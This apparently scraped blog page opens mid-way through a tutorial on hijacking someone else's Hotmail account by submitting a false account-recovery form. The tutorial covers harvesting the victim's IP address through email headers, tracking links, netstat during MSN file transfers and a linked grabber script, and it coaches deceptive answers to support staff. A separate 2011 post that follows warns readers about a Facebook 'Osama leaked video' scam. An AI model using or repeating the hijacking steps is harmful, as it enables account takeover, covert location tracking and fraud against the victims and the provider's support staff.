Step 3: The e-mail address for us to send a response to .simple, give them your email address… could use a fake one if you’re paranoid (one you got access too), but i dont see any risk.

Step 4: Primary e-mail address/member ID associated with the account you are inquiring about.
Here you put in your victims email address (the one you’re trying to hack).

Step 5: Date of birth.
You can simply give them the year, if you dont know any further then that..but if you want to be on the safe side, read step 2, and use those techniques to find their date of birth.

Step 6: Country
If you dont know their country, which you probably should, use their IP address which you will have in one of the next steps to find it, by using

http://www.ip-adress.com/ip_tracer/

Step 7: State
same deal, use their IP addy if you dont know it already

Step 8: ZIP or postal code
Same deal again, it’s usually correct if you use the IP addy…just use http://www.ip-adress.com/ip_tracer/
and find their town/suburb or whatever, and google the ZIP code for it.

Step 9: The secret answer to your question
simply put “i dont remember”

Step 10: Your alternate email address
for this, you just put in the email address you’re trying to hack, you dont need their alternate email address.

Step 11: Your IP Address
Okay so here’s probably the toughest one, but it’s still easy. (NOTE: It’s very hard to revert an account unless you successfully complete this step)
There’s alot of ways to get their IP, i’ll give you the easy ones.

Email: Get them to send you an email somehow, it doesnt matter how, you can just send an email saying:
“hey, how are you?” and they’ll probably reply. Once you have their email (dont use old emails, please, everybody uses dynamic IP’s these days)
right click on it, and click “view source”, you will see something like this:
.now you want to find “X-Originating-IP: [XX.XXX.XX.XX]” That is their IP address.

Website: Go here http://www.reza24.com/ip and give them your nickname or whatever you want them to call you, and your email address, like this:

They will give you a URL, find a way to send that to your victim.
For example, for one of my victims, he said “ha i got 3 firewalls you cant hack me” so i told him to goto that URL if he’s so safe, and i told him if he doesnt, he needs to grow some balls…lol he did Smile
BTW, when they go there, it just says the webpage cant be found, and then you get an email from reza24 telling their IP icon biggrin How to Hack Any Hotmail Account Easily

Full credit of this site goes to Raider, he did an awesome job Smile he deserves some rep for it.

MSN: if you can talk to them on msn, then you can get their IP that way too..there’s two ways, either download a easy-to-use script, or do it manually with cmd,
i’ll show you how to do it manually first.

Manually: Send them a file, or get them to send you a file.
“hey, i love that song, can you send me it?” or “omg, this is the funniest picture ever”.
Before you start the transfer though, goto start > run (if you’re using vista, just press the windows key) and type in cmd, and hit enter.
type in the following: netstat -n and hit enter, it will show you a list of active connections to different IP’s.

Remember or take a screenshot of those IP’s, because once you start the transfer, type in netstat again while it’s transferring and check for any new IP’s, that is your victims IP.

With a script:
IF you have windows live messenger plus (probably the best WLM IMO), download this script:

http://rapidshare.com/files/133356881/IPGet_1.50.rar

It’s called IP-Get, and will show you your current msn contacts IP addresses IF you’re currently connected to them with a fileshare. It will also allow you to save the IP addresses, and look up their locations.

There are other ways, but surely, you should have been able to get their IP by now…if not, look up a tut on it, using the search feature.

Step 12: Your internet service provider
very easy to find, use their IP, either using the IP get script if you have it, or http://www.ip-adress.com/ip_tracer/

Step 13: The last date and time that you successfully signed in
Unless you know this as a fact, either take your best guess, say you dont remember, or yesterday.

Step 14: The names of any folders that you created in addition to the default folders
leave this blank, or say you dont know (unless you know this for a fact).

Step 15: Names of contacts in your hotmail address book
give them all the contacts you know are definately or most likely in there, including yourself, and even their other accounts (they might add themselves, everybody seems to). Also give them wilma@live.com and smarterchild@hotmail.com, as most people have them added.

Step 16: Subjects of any old mail that is in your inbox
okay just use common sense for this one, things to include are:
hey, how are you, RE:, FW:, admin, windows live, hotmail staff, recovery, registration, support, lol, password, comfirmation, noreply, delivery status notification (failure).

Also, if they are subscribed to any forums , social networking sites (like myspace, bebo) or online games (like RuneScape, WoW), then be sure to include them too.

Step 17: Names of contacts on your messenger contact list
If you happen to know any of their friends, this is where you put their display name…if you dont have them added, put their first names, and if you dont know them at all, just leave it blank, or say you dont remember.

Step 18: Your Messenger nickname
If you know it, put it in..if you dont, say “i cant remember it exactly” or leave it blank.

Step 19: The rest you dont really need to worry about, except for in additional info, can put anything else that might make you sound more convincing..like:
“please do your best to recover my account, i dont want to go and have to add all my friends again, it’d be a great help if you got it back for me, thank you in advance.”

obviously dont put exactly that, but you get the gist of it Smile
Okay, i believe that is it, within 24 hours you will recieve an email from customer support, they will either give you a link to reset your (victims) password, or ask for you to send it again with more info, as an email reply..and in that case, you dont have much luck, cause they can just get your IP address from the email and know you’re lying Smile so try again.

Thursday, May 5, 2011

New Facebook Spam "Osama Censored Video Leaked" Hitting Users


This time its a spam information update for all my readers and it is related to facebook, as it is number one in ranking traffic vise and also a large number of people use it thats why for keeping you all up to date i am posting this, As you can see in the screen shot at left that the scam claims to have something secret in it and surely many people will click it to watch the fake censored video but what will be the result that there account will be used as a carrier for spam and thus this spam will autmatically be forwarded to the friends wall, Similarly i have investigated a bit more and some of such kinds of scams ask victims to follow the shown instructions after clicking the link to unlock the censored video, But what will be the result that after following instructions you will only be harmed and your account may be compromised but no such video will appear. You can see well that the creator of such scam has shortened all the URL,s so that the original URL,s may not be banned from facebook soon!

Different Forms Of this "Osama Leaked Video Scam":-

Similarly its another scam of same kind, They have used a picture like the video thumbnail to fool you and all facebook users, Since a video thumbnail looks like this picture and victim will get deceived and will click it thinking a video, But if you see below is written, bit.ly which is URL shortner service.
See to fool you a play icon is used in thumbnail. So, that you may think it a video But its obvious for an experienced user that it is fake.

What to do with this "Fake Osama Video" Spreading Scam:-

Wherever you find this scam and any link related to it, Just report it to Facebook and there crew will take notice of it soon and will block it at Facebook. And don't click it If you have opened it accidentally then please don't follow the instructions to watch the video as nothing will happen except your own loss.